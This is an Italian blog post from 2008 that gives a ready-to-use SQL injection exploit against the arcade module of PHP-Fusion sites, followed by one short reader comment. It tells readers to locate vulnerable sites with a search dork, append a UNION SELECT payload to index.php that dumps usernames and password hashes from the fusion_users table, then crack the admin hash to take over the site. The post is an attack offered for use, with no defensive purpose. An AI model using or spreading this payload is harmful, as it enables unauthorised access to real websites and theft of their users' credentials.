«
»

exploit in /arcade/index.php

Questo tipo di exploit e relativamente un gioco da ragazzi.
1.Il Bug si trova nell index.php.
2.Facciamo una ricerca con google DorK cioe http://www.blackwebsearch.com/index.html Al meno coi mi risulta a me..
3.Troviamo la vittima cercando con dork /infusions/arcade/
4.Aggiungiamo:

exploit:index.php?op=view_game_list&cid=-1/**/union/**

/select/**/null,user_name,user_password,

null,null,null/**/from/**/fusion_users/*

al nostro sito e vuala e fatta.
Davanti a voi tutte le hash delle password del sito compresa quella del admin
Troviamo la password e siamo Admin.

Questo post è stato pubblicato il maggio 27, 2008 alle 11:40 pm ed è archiviato in exploit in /arcade/index.php . Puoi seguire i commenti a questo post con il feed RSS 2.0. Puoi lasciare una risposta, o mandare un trackback dal tuo sito.

2 Risposte a “exploit in /arcade/index.php”

  1. ZoS Dice:
    luglio 11, 2008 a 4:31 pm

    6 stato mlt chiaro ma a me purtroppo nn funziona…

    Replica

Lascia un Commento